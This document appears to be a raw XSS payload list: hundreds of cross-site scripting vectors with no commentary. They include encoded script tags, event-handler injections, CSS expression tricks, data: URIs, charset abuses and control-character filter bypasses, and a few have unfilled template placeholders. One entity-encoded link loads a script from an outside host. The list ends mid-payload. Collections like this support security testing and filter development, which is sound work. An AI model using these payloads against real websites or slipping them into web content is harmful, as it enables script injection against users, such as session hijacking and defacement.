<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)></script> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript&colon;alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> <script\x20type="text/javascript">javascript:alert(1);</script> <script\x3Etype="text/javascript">javascript:alert(1);</script> <script\x0Dtype="text/javascript">javascript:alert(1);</script> <script\x09type="text/javascript">javascript:alert(1);</script> <script\x0Ctype="text/javascript">javascript:alert(1);</script> <script\x2Ftype="text/javascript">javascript:alert(1);</script> <script\x0Atype="text/javascript">javascript:alert(1);</script> '`"><\x3Cscript>javascript:alert(1)</script>         '`"><\x00script>javascript:alert(1)</script> <img src=1 href=1 onerror="javascript:alert(1)"></img> <audio src=1 href=1 onerror="javascript:alert(1)"></audio> <video src=1 href=1 onerror="javascript:alert(1)"></video> <body src=1 href=1 onerror="javascript:alert(1)"></body> <image src=1 href=1 onerror="javascript:alert(1)"></image> <object src=1 href=1 onerror="javascript:alert(1)"></object> <script src=1 href=1 onerror="javascript:alert(1)"></script> <svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> <iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> <body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> <frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> <html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> <svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> <body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> <body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> <body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> <body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> <style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> <body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> <frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> <applet onError applet onError="javascript:javascript:alert(1)"></applet onError> <marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> <script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> <html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> <html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> <marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> <frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> <svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> <html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> <body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> <body onResize body onResize="javascript:javascript:alert(1)"></body onResize> <object onError object onError="javascript:javascript:alert(1)"></object onError> <body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> <html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> <body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> <svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> <applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> <body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> <body onunload body onunload="javascript:javascript:alert(1)"></body onunload> <iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> <body onload body onload="javascript:javascript:alert(1)"></body onload> <html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> <object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> <body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> <body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> <iframe src iframe src="javascript:javascript:alert(1)"></iframe src> <svg onload svg onload="javascript:javascript:alert(1)"></svg onload> <html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> <body onblur body onblur="javascript:javascript:alert(1)"></body onblur> \x3Cscript>javascript:alert(1)</script> '"`><script>/* *\x2Fjavascript:alert(1)// */</script> <script>javascript:alert(1)</script\x0D <script>javascript:alert(1)</script\x0A <script>javascript:alert(1)</script\x0B <script charset="\x22>javascript:alert(1)</script> <!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> --><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> `"'><img src='#\x27 onerror=javascript:alert(1)> <a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> "'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> <a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> <script>/* *\x2A/javascript:alert(1)// */</script> <script>/* *\x00/javascript:alert(1)// */</script> <style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF <script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> '`"><\x3Cscript>javascript:alert(1)</script> '`"><\x00script>javascript:alert(1)</script> "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> "'`><\x00img src=xxx:x onerror=javascript:alert(1)> <script src="data:text/plain\x2Cjavascript:alert(1)"></script> <script src="data:\xD4\x8F,javascript:alert(1)"></script> <script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> <script src="data:\xCB\x8F,javascript:alert(1)"></script> <script\x20type="text/javascript">javascript:alert(1);</script> <script\x3Etype="text/javascript">javascript:alert(1);</script> <script\x0Dtype="text/javascript">javascript:alert(1);</script> <script\x09type="text/javascript">javascript:alert(1);</script> <script\x0Ctype="text/javascript">javascript:alert(1);</script> <script\x2Ftype="text/javascript">javascript:alert(1);</script> <script\x0Atype="text/javascript">javascript:alert(1);</script> ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF ABC<div style="x:expression\x5C(javascript:alert(1)">DEF ABC<div style="x:expression\x00(javascript:alert(1)">DEF ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF ABC<div style="x:\x09expression(javascript:alert(1)">DEF ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF ABC<div style="x:\x20expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF ABC<div style="x:\x00expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> `"'><img src=xxx:x \x22onerror=javascript:alert(1)> `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> `"'><img src=xxx:x \x0Donerror=javascript:alert(1)> `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> `"'><img src=xxx:x \x09onerror=javascript:alert(1)> `"'><img src=xxx:x \x0Conerror=javascript:alert(1)> `"'><img src=xxx:x \x00onerror=javascript:alert(1)> `"'><img src=xxx:x \x27onerror=javascript:alert(1)> `"'><img src=xxx:x \x20onerror=javascript:alert(1)> "`'><script>\x3Bjavascript:alert(1)</script> "`'><script>\x0Djavascript:alert(1)</script> "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> "`'><script>\xE2\x80\x81javascript:alert(1)</script> "`'><script>\xE2\x80\x84javascript:alert(1)</script> "`'><script>\xE3\x80\x80javascript:alert(1)</script> "`'><script>\x09javascript:alert(1)</script> "`'><script>\xE2\x80\x89javascript:alert(1)</script> "`'><script>\xE2\x80\x85javascript:alert(1)</script> "`'><script>\xE2\x80\x88javascript:alert(1)</script> "`'><script>\x00javascript:alert(1)</script> "`'><script>\xE2\x80\xA8javascript:alert(1)</script> "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> "`'><script>\xE1\x9A\x80javascript:alert(1)</script> "`'><script>\x0Cjavascript:alert(1)</script> "`'><script>\x2Bjavascript:alert(1)</script> "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> "`'><script>-javascript:alert(1)</script> "`'><script>\x0Ajavascript:alert(1)</script> "`'><script>\xE2\x80\xAFjavascript:alert(1)</script> "`'><script>\x7Ejavascript:alert(1)</script> "`'><script>\xE2\x80\x87javascript:alert(1)</script> "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> "`'><script>\xE2\x80\xA9javascript:alert(1)</script> "`'><script>\xC2\x85javascript:alert(1)</script> "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> "`'><script>\xE2\x80\x83javascript:alert(1)</script> "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> "`'><script>\xE2\x80\x80javascript:alert(1)</script> "`'><script>\x21javascript:alert(1)</script> "`'><script>\xE2\x80\x82javascript:alert(1)</script> "`'><script>\xE2\x80\x86javascript:alert(1)</script> "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> "`'><script>\x0Bjavascript:alert(1)</script> "`'><script>\x20javascript:alert(1)</script> "`'><script>\xC2\xA0javascript:alert(1)</script> "/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> "/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> "/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> "/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> "/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> "/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> "/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> "/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> <script\x2F>javascript:alert(1)</script> <script\x20>javascript:alert(1)</script> <script\x0D>javascript:alert(1)</script> <script\x0A>javascript:alert(1)</script> <script\x0C>javascript:alert(1)</script> <script\x00>javascript:alert(1)</script> <script\x09>javascript:alert(1)</script> "><img src=x onerror=javascript:alert(1)> "><img src=x onerror=javascript:alert('1')> "><img src=x onerror=javascript:alert("1")> "><img src=x onerror=javascript:alert(`1`)> "><img src=x onerror=javascript:alert(('1'))> "><img src=x onerror=javascript:alert(("1"))> "><img src=x onerror=javascript:alert((`1`))> "><img src=x onerror=javascript:alert(A)> "><img src=x onerror=javascript:alert((A))> "><img src=x onerror=javascript:alert(('A'))> "><img src=x onerror=javascript:alert('A')> "><img src=x onerror=javascript:alert(("A"))> "><img src=x onerror=javascript:alert("A")> "><img src=x onerror=javascript:alert((`A`))> "><img src=x onerror=javascript:alert(`A`)> `"'><img src=xxx:x onerror\x0B=javascript:alert(1)> `"'><img src=xxx:x onerror\x00=javascript:alert(1)> `"'><img src=xxx:x onerror\x0C=javascript:alert(1)> `"'><img src=xxx:x onerror\x0D=javascript:alert(1)> `"'><img src=xxx:x onerror\x20=javascript:alert(1)> `"'><img src=xxx:x onerror\x0A=javascript:alert(1)> `"'><img src=xxx:x onerror\x09=javascript:alert(1)> <script>javascript:alert(1)<\x00/script> <img src=# onerror\x3D"javascript:alert(1)" > <input onfocus=javascript:alert(1) autofocus> <input onblur=javascript:alert(1) autofocus><input autofocus> <video poster=javascript:javascript:alert(1)// <body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> <form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X <video><source onerror="javascript:javascript:alert(1)"> <video onerror="javascript:javascript:alert(1)"><source> <form><button formaction="javascript:javascript:alert(1)">X <body oninput=javascript:alert(1)><input autofocus> <math href="javascript:javascript:alert(1)">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> <frameset onload=javascript:alert(1)> <table background="javascript:javascript:alert(1)"> <!--<img src="--><img src=x onerror=javascript:alert(1)//"> <comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> <![><img src="]><img src=x onerror=javascript:alert(1)//"> <style><img src="</style><img src=x onerror=javascript:alert(1)//"> <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> <object data="data:text/html;base64,%(base64)s"> <embed src="data:text/html;base64,%(base64)s"> <b <script>alert(1)</script>0 <div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> <x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> <embed src="javascript:alert(1)"> <img src="javascript:alert(1)"> <image src="javascript:alert(1)"> <script src="javascript:alert(1)"> <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x <? foo="><script>javascript:alert(1)</script>"> <! foo="><script>javascript:alert(1)</script>"> </ foo="><script>javascript:alert(1)</script>"> <? foo="><x foo='?><script>javascript:alert(1)</script>'>"> <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> <% foo><x foo="%><script>javascript:alert(1)</script>"> <div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> <img \x00src=x onerror="alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img \x11src=x onerror="javascript:alert(1)"> <img \x12src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x10src=x onerror="javascript:alert(1)"> <img\x13src=x onerror="javascript:alert(1)"> <img\x32src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x11src=x onerror="javascript:alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img \x34src=x onerror="javascript:alert(1)"> <img \x39src=x onerror="javascript:alert(1)"> <img \x00src=x onerror="javascript:alert(1)"> <img src\x09=x onerror="javascript:alert(1)"> <img src\x10=x onerror="javascript:alert(1)"> <img src\x13=x onerror="javascript:alert(1)"> <img src\x32=x onerror="javascript:alert(1)"> <img src\x12=x onerror="javascript:alert(1)"> <img src\x11=x onerror="javascript:alert(1)"> <img src\x00=x onerror="javascript:alert(1)"> <img src\x47=x onerror="javascript:alert(1)"> <img src=x\x09onerror="javascript:alert(1)"> <img src=x\x10onerror="javascript:alert(1)"> <img src=x\x11onerror="javascript:alert(1)"> <img src=x\x12onerror="javascript:alert(1)"> <img src=x\x13onerror="javascript:alert(1)"> <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> <img src=x onerror=\x09"javascript:alert(1)"> <img src=x onerror=\x10"javascript:alert(1)"> <img src=x onerror=\x11"javascript:alert(1)"> <img src=x onerror=\x12"javascript:alert(1)"> <img src=x onerror=\x32"javascript:alert(1)"> <img src=x onerror=\x00"javascript:alert(1)"> <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> <img src="x` `<script>javascript:alert(1)</script>"` `> <img src onerror /" '"= alt=javascript:alert(1)//"> <title onpropertychange=javascript:alert(1)></title><title title=> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> <!--[if]><script>javascript:alert(1)</script --> <!--[if<img src=x onerror=javascript:alert(1)//]> --> <script src="/\%(jscript)s"></script> <script src="\\%(jscript)s"></script> <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> <a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d <style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> <style>*[{}@import'%(css)s?]</style>X <div style="font-family:'foo;color:red;';">XXX <div style="font-family:foo}color=red;">XXX <// style=x:expression\28javascript:alert(1)\29> <style>*{x:expression(javascript:alert(1))}</style> <div style=content:url(%(svg)s)></div> <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X <div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> <div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X <div id="x">XXX</div> <style>  #x{font-family:foo[bar;color:green;}  #y];color:red;{}  </style> <x style="background:url('x&#1;;color:red;/*')">XXX</x> <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> <meta charset="mac-farsi">ºscriptæjavascript:alert(1)º/scriptæ X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`> 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>> <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> <x style="behavior:url(%(sct)s)"> <xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> <event-source src="%(event)s" onload="javascript:alert(1)"> <a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)>"> <script>%(payload)s</script> <script src=%(jscript)s></script> <script language='javascript' src='%(jscript)s'></script> <script>javascript:alert(1)</script> <IMG SRC="javascript:javascript:alert(1);"> <IMG SRC=javascript:javascript:alert(1)> <IMG SRC=`javascript:javascript:alert(1)`> <SCRIPT SRC=%(jscript)s?<B> <FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> <BODY ONLOAD=javascript:alert(1)> <BODY ONLOAD=javascript:javascript:alert(1)> <IMG SRC="jav ascript:javascript:alert(1);"> <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> <SCRIPT/SRC="%(jscript)s"></SCRIPT> <<SCRIPT>%(payload)s//<</SCRIPT> <IMG SRC="javascript:javascript:alert(1)" <iframe src=%(scriptlet)s < <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> <IMG DYNSRC="javascript:javascript:alert(1)"> <IMG LOWSRC="javascript:javascript:alert(1)"> <BGSOUND SRC="javascript:javascript:alert(1);"> <BR SIZE="&{javascript:alert(1)}"> <LAYER SRC="%(scriptlet)s"></LAYER> <LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> <STYLE>@import'%(css)s';</STYLE> <META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> <XSS STYLE="behavior: 